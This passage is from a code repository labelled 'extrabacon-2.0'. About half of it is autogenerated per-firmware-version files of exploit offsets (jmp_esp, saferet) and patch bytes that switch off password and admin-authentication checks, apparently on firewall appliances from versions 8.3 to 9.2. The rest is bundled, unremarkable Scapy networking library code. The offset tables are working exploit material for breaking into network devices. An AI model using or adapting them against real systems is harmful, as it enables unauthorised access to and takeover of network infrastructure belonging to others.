pmcheck_offset = "48.137.59.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.224.6.8" 13 | admauth_offset = "32.228.6.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.3(2)40" = ["169.151.13.8","124.48.196.8","88","0.128.59.9","48.137.59.9","85.49.192.137","0.224.6.8","32.228.6.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(1) 4 | ## 5 | 6 | jmp_esp_offset = "173.58.17.9" 7 | saferet_offset = "6.12.219.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.240.72.9" 10 | pmcheck_offset = "240.252.72.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.48.8.8" 13 | admauth_offset = "144.56.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(1)" = ["173.58.17.9","6.12.219.8","72","0.240.72.9","240.252.72.9","85.49.192.137","0.48.8.8","144.56.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(2).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(2) 4 | ## 5 | 6 | jmp_esp_offset = "25.71.20.9" 7 | saferet_offset = "230.222.223.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.128.83.9" 10 | pmcheck_offset = "240.143.83.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "224.19.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(2)" = ["25.71.20.9","230.222.223.8","72","0.128.83.9","240.143.83.9","85.49.192.137","0.16.8.8","224.19.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(3).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(3) 4 | ## 5 | 6 | jmp_esp_offset = "13.178.7.8" 7 | saferet_offset = "150.219.224.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.192.84.9" 10 | pmcheck_offset = "208.207.84.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "208.23.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(3)" = ["13.178.7.8","150.219.224.8","72","0.192.84.9","208.207.84.9","85.49.192.137","0.16.8.8","208.23.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4) 4 | ## 5 | 6 | jmp_esp_offset = "111.198.161.9" 7 | saferet_offset = "181.105.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.192.85.9" 10 | pmcheck_offset = "240.201.85.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "176.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)" = ["111.198.161.9","181.105.226.8","72","0.192.85.9","240.201.85.9","85.49.192.137","0.16.8.8","176.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4)1.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4)1 4 | ## 5 | 6 | jmp_esp_offset = "253.74.114.8" 7 | saferet_offset = "150.236.225.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.192.85.9" 10 | pmcheck_offset = "176.202.85.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "176.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)1" = ["253.74.114.8","150.236.225.8","72","0.192.85.9","176.202.85.9","85.49.192.137","0.16.8.8","176.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4)3.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4)3 4 | ## 5 | 6 | jmp_esp_offset = "164.119.8.8" 7 | saferet_offset = "102.0.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.240.85.9" 10 | pmcheck_offset = "96.252.85.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "160.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)3" = ["164.119.8.8","102.0.226.8","72","0.240.85.9","96.252.85.9","85.49.192.137","0.16.8.8","160.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4)5.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4)5 4 | ## 5 | 6 | jmp_esp_offset = "202.250.13.8" 7 | saferet_offset = "246.48.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.64.86.9" 10 | pmcheck_offset = "16.69.86.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "160.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)5" = ["202.250.13.8","246.48.226.8","72","0.64.86.9","16.69.86.9","85.49.192.137","0.16.8.8","160.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(4)9.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(4)9 4 | ## 5 | 6 | jmp_esp_offset = "173.23.5.8" 7 | saferet_offset = "166.113.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.144.86.9" 10 | pmcheck_offset = "224.154.86.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.16.8.8" 13 | admauth_offset = "160.27.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(4)9" = ["173.23.5.8","166.113.226.8","72","0.144.86.9","224.154.86.9","85.49.192.137","0.16.8.8","160.27.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(6)5.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(6)5 4 | ## 5 | 6 | jmp_esp_offset = "125.63.32.8" 7 | saferet_offset = "166.11.228.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.176.88.9" 10 | pmcheck_offset = "96.186.88.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.32.8.8" 13 | admauth_offset = "240.33.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(6)5" = ["125.63.32.8","166.11.228.8","72","0.176.88.9","96.186.88.9","85.49.192.137","0.32.8.8","240.33.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_8_4(7).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 8.4(7) 4 | ## 5 | 6 | jmp_esp_offset = "109.22.18.8" 7 | saferet_offset = "70.254.226.8" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.144.87.9" 10 | pmcheck_offset = "80.156.87.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.32.8.8" 13 | admauth_offset = "0.34.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "8.4(7)" = ["109.22.18.8","70.254.226.8","72","0.144.87.9","80.156.87.9","85.49.192.137","0.32.8.8","0.34.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_0(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.0(1) 4 | ## 5 | 6 | jmp_esp_offset = "221.227.27.8" 7 | saferet_offset = "134.13.3.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.176.126.9" 10 | pmcheck_offset = "112.182.126.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.32.8.8" 13 | admauth_offset = "240.45.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.0(1)" = ["221.227.27.8","134.13.3.9","72","0.176.126.9","112.182.126.9","85.49.192.137","0.32.8.8","240.45.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_1(1)4.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.1(1)4 4 | ## 5 | 6 | jmp_esp_offset = "173.250.27.8" 7 | saferet_offset = "134.177.3.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.112.127.9" 10 | pmcheck_offset = "176.119.127.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.48.8.8" 13 | admauth_offset = "96.49.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.1(1)4" = ["173.250.27.8","134.177.3.9","72","0.112.127.9","176.119.127.9","85.49.192.137","0.48.8.8","96.49.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(1).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(1) 4 | ## 5 | 6 | jmp_esp_offset = "197.180.10.8" 7 | saferet_offset = "54.118.39.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.240.182.9" 10 | pmcheck_offset = "16.252.182.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "176.84.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(1)" = ["197.180.10.8","54.118.39.9","72","0.240.182.9","16.252.182.9","85.49.192.137","0.80.8.8","176.84.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(2)8.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(2)8 4 | ## 5 | 6 | jmp_esp_offset = "21.187.10.8" 7 | saferet_offset = "54.245.39.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.240.183.9" 10 | pmcheck_offset = "16.252.183.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "64.90.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(2)8" = ["21.187.10.8","54.245.39.9","72","0.240.183.9","16.252.183.9","85.49.192.137","0.80.8.8","64.90.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(3).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(3) 4 | ## 5 | 6 | jmp_esp_offset = "29.112.29.8" 7 | saferet_offset = "134.115.39.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.128.183.9" 10 | pmcheck_offset = "16.128.183.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "64.90.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(3)" = ["29.112.29.8","134.115.39.9","72","0.128.183.9","16.128.183.9","85.49.192.137","0.80.8.8","64.90.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(4).py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(4) 4 | ## 5 | 6 | jmp_esp_offset = "101.190.10.8" 7 | saferet_offset = "54.209.39.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.48.184.9" 10 | pmcheck_offset = "192.52.184.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "0.91.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(4)" = ["101.190.10.8","54.209.39.9","72","0.48.184.9","192.52.184.9","85.49.192.137","0.80.8.8","0.91.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/improved/shellcode_9_2(4)13.py: -------------------------------------------------------------------------------- 1 | ## 2 | ## this file autogenerated 3 | ## 9.2(4)13 4 | ## 5 | 6 | jmp_esp_offset = "197.207.10.8" 7 | saferet_offset = "70.97.40.9" 8 | fix_ebp = "72" 9 | pmcheck_bounds = "0.16.185.9" 10 | pmcheck_offset = "240.30.185.9" 11 | pmcheck_code = "85.49.192.137" 12 | admauth_bounds = "0.80.8.8" 13 | admauth_offset = "240.95.8.8" 14 | admauth_code = "85.137.229.87" 15 | 16 | 17 | # "9.2(4)13" = ["197.207.10.8","70.97.40.9","72","0.16.185.9","240.30.185.9","85.49.192.137","0.80.8.8","240.95.8.8","85.137.229.87"], -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | 8 | if __name__ == "__main__": 9 | from scapy.main import interact 10 | interact() 11 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | from base_classes import * 8 | from config import * 9 | from dadict import * 10 | from data import * 11 | from error import * 12 | from themes import * 13 | from arch import * 14 | 15 | from plist import * 16 | from fields import * 17 | from packet import * 18 | from asn1fields import * 19 | from asn1packet import * 20 | 21 | from utils import * 22 | from route import * 23 | if conf.ipv6_enabled: 24 | from utils6 import * 25 | from route6 import * 26 | from sendrecv import * 27 | from supersocket import * 28 | from volatile import * 29 | from as_resolvers import * 30 | 31 | from ansmachine import * 32 | from automaton import * 33 | from autorun import * 34 | 35 | from main import * 36 | 37 | from layers.all import * 38 | 39 | from asn1.asn1 import * 40 | from asn1.ber import * 41 | from asn1.mib import * 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/ansmachine.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | ######################## 7 | ## Answering machines ## 8 | ######################## 9 | 10 | from sendrecv import send,sendp,sniff 11 | from config import conf 12 | from error import log_interactive 13 | 14 | class ReferenceAM(type): 15 | def __new__(cls, name, bases, dct): 16 | o = super(ReferenceAM, cls).__new__(cls, name, bases, dct) 17 | if o.function_name: 18 | globals()[o.function_name] = lambda o=o,*args,**kargs: o(*args,**kargs)() 19 | return o 20 | 21 | 22 | class AnsweringMachine(object): 23 | __metaclass__ = ReferenceAM 24 | function_name = "" 25 | filter = None 26 | sniff_options = { "store":0 } 27 | sniff_options_list = [ "store", "iface", "count", "promisc", "filter", "type", "prn" ] 28 | send_options = { "verbose":0 } 29 | send_options_list = ["iface", "inter", "loop", "verbose"] 30 | send_function = staticmethod(send) 31 | 32 | 33 | def __init__(self, **kargs): 34 | self.mode = 0 35 | if self.filter: 36 | kargs.setdefault("filter",self.filter) 37 | kargs.setdefault("prn", self.reply) 38 | self.optam1 = {} 39 | self.optam2 = {} 40 | self.optam0 = {} 41 | doptsend,doptsniff = self.parse_all_options(1, kargs) 42 | self.defoptsend = self.send_options.copy() 43 | self.defoptsend.update(doptsend) 44 | self.defoptsniff = self.sniff_options.copy() 45 | self.defoptsniff.update(doptsniff) 46 | self.optsend,self.optsniff = [{},{}] 47 | 48 | def __getattr__(self, attr): 49 | for d in [self.optam2, self.optam1]: 50 | if attr in d: 51 | return d[attr] 52 | raise AttributeError,attr 53 | 54 | def __setattr__(self, attr, val): 55 | mode = self.__dict__.get("mode",0) 56 | if mode == 0: 57 | self.__dict__[attr] = val 58 | else: 59 | [self.optam1, self.optam2][mode-1][attr] = val 60 | 61 | def parse_options(self): 62 | pass 63 | 64 | def parse_all_options(self, mode, kargs): 65 | sniffopt = {} 66 | sendopt = {} 67 | for k in kargs.keys(): 68 | if k in self.sniff_options_list: 69 | sniffopt[k] = kargs[k] 70 | if k in self.send_options_list: 71 | sendopt[k] = kargs[k] 72 | if k in self.sniff_options_list+self.send_options_list: 73 | del(kargs[k]) 74 | if mode != 2 or kargs: 75 | if mode == 1: 76 | self.optam0 = kargs 77 | elif mode == 2 and kargs: 78 | k = self.optam0.copy() 79 | k.update(kargs) 80 | self.parse_options(**k) 81 | kargs = k 82 | omode = self.__dict__.get("mode",0) 83 | self.__dict__["mode"] = mode 84 | self.parse_options(**kargs) 85 | self.__dict__["mode"] = omode 86 | return sendopt,sniffopt 87 | 88 | def is_request(self, req): 89 | return 1 90 | 91 | def make_reply(self, req): 92 | return req 93 | 94 | def send_reply(self, reply): 95 | self.send_function(reply, **self.optsend) 96 | 97 | def print_reply(self, req, reply): 98 | print "%s ==> %s" % (req.summary(),reply.summary()) 99 | 100 | def reply(self, pkt): 101 | if not self.is_request(pkt): 102 | return 103 | reply = self.make_reply(pkt) 104 | self.send_reply(reply) 105 | if conf.verb >= 0: 106 | self.print_reply(pkt, reply) 107 | 108 | def run(self, *args, **kargs): 109 | log_interactive.warning("run() method deprecated. The intance is now callable") 110 | self(*args,**kargs) 111 | 112 | def __call__(self, *args, **kargs): 113 | optsend,optsniff = self.parse_all_options(2,kargs) 114 | self.optsend=self.defoptsend.copy() 115 | self.optsend.update(optsend) 116 | self.optsniff=self.defoptsniff.copy() 117 | self.optsniff.update(optsniff) 118 | 119 | try: 120 | self.sniff() 121 | except KeyboardInterrupt: 122 | print "Interrupted by user" 123 | 124 | def sniff(self): 125 | sniff(**self.optsniff) 126 | 127 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/arch/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | import sys,os,socket 8 | from scapy.error import * 9 | import scapy.config 10 | 11 | try: 12 | import Gnuplot 13 | GNUPLOT=1 14 | except ImportError: 15 | log_loading.info("Can't import python gnuplot wrapper . Won't be able to plot.") 16 | GNUPLOT=0 17 | 18 | try: 19 | import pyx 20 | PYX=1 21 | except ImportError: 22 | log_loading.info("Can't import PyX. Won't be able to use psdump() or pdfdump().") 23 | PYX=0 24 | 25 | 26 | def str2mac(s): 27 | return ("%02x:"*6)[:-1] % tuple(map(ord, s)) 28 | 29 | 30 | 31 | def get_if_addr(iff): 32 | return socket.inet_ntoa(get_if_raw_addr(iff)) 33 | 34 | def get_if_hwaddr(iff): 35 | addrfamily, mac = get_if_raw_hwaddr(iff) 36 | if addrfamily in [ARPHDR_ETHER,ARPHDR_LOOPBACK]: 37 | return str2mac(mac) 38 | else: 39 | raise Scapy_Exception("Unsupported address family (%i) for interface [%s]" % (addrfamily,iff)) 40 | 41 | 42 | LINUX=sys.platform.startswith("linux") 43 | OPENBSD=sys.platform.startswith("openbsd") 44 | FREEBSD=sys.platform.startswith("freebsd") 45 | NETBSD = sys.platform.startswith("netbsd") 46 | DARWIN=sys.platform.startswith("darwin") 47 | SOLARIS=sys.platform.startswith("sunos") 48 | WINDOWS=sys.platform.startswith("win32") 49 | 50 | X86_64 = not WINDOWS and (os.uname()[4] == 'x86_64') 51 | 52 | 53 | # Next step is to import following architecture specific functions: 54 | # def get_if_raw_hwaddr(iff) 55 | # def get_if_raw_addr(iff): 56 | # def get_if_list(): 57 | # def get_working_if(): 58 | # def attach_filter(s, filter): 59 | # def set_promisc(s,iff,val=1): 60 | # def read_routes(): 61 | # def get_if(iff,cmd): 62 | # def get_if_index(iff): 63 | 64 | 65 | 66 | if LINUX: 67 | from linux import * 68 | if scapy.config.conf.use_pcap or scapy.config.conf.use_dnet: 69 | from pcapdnet import * 70 | elif OPENBSD or FREEBSD or NETBSD or DARWIN: 71 | from bsd import * 72 | elif SOLARIS: 73 | from solaris import * 74 | elif WINDOWS: 75 | from windows import * 76 | 77 | if scapy.config.conf.iface is None: 78 | scapy.config.conf.iface = LOOPBACK_NAME 79 | 80 | 81 | def get_if_raw_addr6(iff): 82 | """ 83 | Returns the main global unicast address associated with provided 84 | interface, in network format. If no global address is found, None 85 | is returned. 86 | """ 87 | r = filter(lambda x: x[2] == iff and x[1] == IPV6_ADDR_GLOBAL, in6_getifaddr()) 88 | if len(r) == 0: 89 | return None 90 | else: 91 | r = r[0][0] 92 | return inet_pton(socket.AF_INET6, r) 93 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/arch/bsd.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | 8 | LOOPBACK_NAME="lo0" 9 | 10 | from unix import * 11 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/arch/solaris.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | # IPPROTO_GRE is missing on Solaris 8 | import socket 9 | socket.IPPROTO_GRE = 47 10 | 11 | LOOPBACK_NAME="lo0" 12 | 13 | from unix import * 14 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/as_resolvers.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import socket 7 | from config import conf 8 | 9 | class AS_resolver: 10 | server = None 11 | options = "-k" 12 | def __init__(self, server=None, port=43, options=None): 13 | if server is not None: 14 | self.server = server 15 | self.port = port 16 | if options is not None: 17 | self.options = options 18 | 19 | def _start(self): 20 | self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 21 | self.s.connect((self.server,self.port)) 22 | if self.options: 23 | self.s.send(self.options+"\n") 24 | self.s.recv(8192) 25 | def _stop(self): 26 | self.s.close() 27 | 28 | def _parse_whois(self, txt): 29 | asn,desc = None,"" 30 | for l in txt.splitlines(): 31 | if not asn and l.startswith("origin:"): 32 | asn = l[7:].strip() 33 | if l.startswith("descr:"): 34 | if desc: 35 | desc += r"\n" 36 | desc += l[6:].strip() 37 | if asn is not None and desc: 38 | break 39 | return asn,desc.strip() 40 | 41 | def _resolve_one(self, ip): 42 | self.s.send("%s\n" % ip) 43 | x = "" 44 | while not ("%" in x or "source" in x): 45 | x += self.s.recv(8192) 46 | asn, desc = self._parse_whois(x) 47 | return ip,asn,desc 48 | def resolve(self, *ips): 49 | self._start() 50 | ret = [] 51 | for ip in ips: 52 | ip,asn,desc = self._resolve_one(ip) 53 | if asn is not None: 54 | ret.append((ip,asn,desc)) 55 | self._stop() 56 | return ret 57 | 58 | class AS_resolver_riswhois(AS_resolver): 59 | server = "riswhois.ripe.net" 60 | options = "-k -M -1" 61 | 62 | 63 | class AS_resolver_radb(AS_resolver): 64 | server = "whois.ra.net" 65 | options = "-k -M" 66 | 67 | 68 | class AS_resolver_cymru(AS_resolver): 69 | server = "whois.cymru.com" 70 | options = None 71 | def resolve(self, *ips): 72 | ASNlist = [] 73 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 74 | s.connect((self.server,self.port)) 75 | s.send("begin\r\n"+"\r\n".join(ips)+"\r\nend\r\n") 76 | r = "" 77 | while 1: 78 | l = s.recv(8192) 79 | if l == "": 80 | break 81 | r += l 82 | s.close() 83 | for l in r.splitlines()[1:]: 84 | if "|" not in l: 85 | continue 86 | asn,ip,desc = map(str.strip, l.split("|")) 87 | if asn == "NA": 88 | continue 89 | asn = int(asn) 90 | ASNlist.append((ip,asn,desc)) 91 | return ASNlist 92 | 93 | class AS_resolver_multi(AS_resolver): 94 | resolvers_list = ( AS_resolver_cymru(),AS_resolver_riswhois(),AS_resolver_radb() ) 95 | def __init__(self, *reslist): 96 | if reslist: 97 | self.resolvers_list = reslist 98 | def resolve(self, *ips): 99 | todo = ips 100 | ret = [] 101 | for ASres in self.resolvers_list: 102 | res = ASres.resolve(*todo) 103 | resolved = [ ip for ip,asn,desc in res ] 104 | todo = [ ip for ip in todo if ip not in resolved ] 105 | ret += res 106 | return ret 107 | 108 | 109 | conf.AS_resolver = AS_resolver_multi() 110 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/asn1/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | # We do not import mib.py because it is more bound to scapy and 7 | # less prone to be used in a standalone fashion 8 | __all__ = ["asn1","ber"] 9 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/asn1/mib.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import re 7 | from glob import glob 8 | from scapy.dadict import DADict,fixname 9 | from scapy.config import conf 10 | from scapy.utils import do_graph 11 | 12 | ################# 13 | ## MIB parsing ## 14 | ################# 15 | 16 | _mib_re_integer = re.compile("^[0-9]+$") 17 | _mib_re_both = re.compile("^([a-zA-Z_][a-zA-Z0-9_-]*)\(([0-9]+)\)$") 18 | _mib_re_oiddecl = re.compile("$\s*([a-zA-Z0-9_-]+)\s+OBJECT([^:\{\}]|\{[^:]+\})+::=\s*\{([^\}]+)\}",re.M) 19 | _mib_re_strings = re.compile('"[^"]*"') 20 | _mib_re_comments = re.compile('--.*(\r|\n)') 21 | 22 | class MIBDict(DADict): 23 | def _findroot(self, x): 24 | if x.startswith("."): 25 | x = x[1:] 26 | if not x.endswith("."): 27 | x += "." 28 | max=0 29 | root="." 30 | for k in self.keys(): 31 | if x.startswith(self[k]+"."): 32 | if max < len(self[k]): 33 | max = len(self[k]) 34 | root = k 35 | return root, x[max:-1] 36 | def _oidname(self, x): 37 | root,remainder = self._findroot(x) 38 | return root+remainder 39 | def _oid(self, x): 40 | xl = x.strip(".").split(".") 41 | p = len(xl)-1 42 | while p >= 0 and _mib_re_integer.match(xl[p]): 43 | p -= 1 44 | if p != 0 or xl[p] not in self: 45 | return x 46 | xl[p] = self[xl[p]] 47 | return ".".join(xl[p:]) 48 | def _make_graph(self, other_keys=[], **kargs): 49 | nodes = [(k,self[k]) for k in self.keys()] 50 | oids = [self[k] for k in self.keys()] 51 | for k in other_keys: 52 | if k not in oids: 53 | nodes.append(self.oidname(k),k) 54 | s = 'digraph "mib" {\n\trankdir=LR;\n\n' 55 | for k,o in nodes: 56 | s += '\t"%s" [ label="%s" ];\n' % (o,k) 57 | s += "\n" 58 | for k,o in nodes: 59 | parent,remainder = self._findroot(o[:-1]) 60 | remainder = remainder[1:]+o[-1] 61 | if parent != ".": 62 | parent = self[parent] 63 | s += '\t"%s" -> "%s" [label="%s"];\n' % (parent, o,remainder) 64 | s += "}\n" 65 | do_graph(s, **kargs) 66 | def __len__(self): 67 | return len(self.keys()) 68 | 69 | 70 | def mib_register(ident, value, the_mib, unresolved): 71 | if ident in the_mib or ident in unresolved: 72 | return ident in the_mib 73 | resval = [] 74 | not_resolved = 0 75 | for v in value: 76 | if _mib_re_integer.match(v): 77 | resval.append(v) 78 | else: 79 | v = fixname(v) 80 | if v not in the_mib: 81 | not_resolved = 1 82 | if v in the_mib: 83 | v = the_mib[v] 84 | elif v in unresolved: 85 | v = unresolved[v] 86 | if type(v) is list: 87 | resval += v 88 | else: 89 | resval.append(v) 90 | if not_resolved: 91 | unresolved[ident] = resval 92 | return False 93 | else: 94 | the_mib[ident] = resval 95 | keys = unresolved.keys() 96 | i = 0 97 | while i < len(keys): 98 | k = keys[i] 99 | if mib_register(k,unresolved[k], the_mib, {}): 100 | del(unresolved[k]) 101 | del(keys[i]) 102 | i = 0 103 | else: 104 | i += 1 105 | 106 | return True 107 | 108 | 109 | def load_mib(filenames): 110 | the_mib = {'iso': ['1']} 111 | unresolved = {} 112 | for k in conf.mib.keys(): 113 | mib_register(k, conf.mib[k].split("."), the_mib, unresolved) 114 | 115 | if type(filenames) is str: 116 | filenames = [filenames] 117 | for fnames in filenames: 118 | for fname in glob(fnames): 119 | f = open(fname) 120 | text = f.read() 121 | cleantext = " ".join(_mib_re_strings.split(" ".join(_mib_re_comments.split(text)))) 122 | for m in _mib_re_oiddecl.finditer(cleantext): 123 | gr = m.groups() 124 | ident,oid = gr[0],gr[-1] 125 | ident=fixname(ident) 126 | oid = oid.split() 127 | for i in range(len(oid)): 128 | m = _mib_re_both.match(oid[i]) 129 | if m: 130 | oid[i] = m.groups()[1] 131 | mib_register(ident, oid, the_mib, unresolved) 132 | 133 | newmib = MIBDict(_name="MIB") 134 | for k,o in the_mib.iteritems(): 135 | newmib[k]=".".join(o) 136 | for k,o in unresolved.iteritems(): 137 | newmib[k]=".".join(o) 138 | 139 | conf.mib=newmib 140 | 141 | 142 | 143 | conf.mib = MIBDict(_name="MIB") 144 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/asn1packet.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See 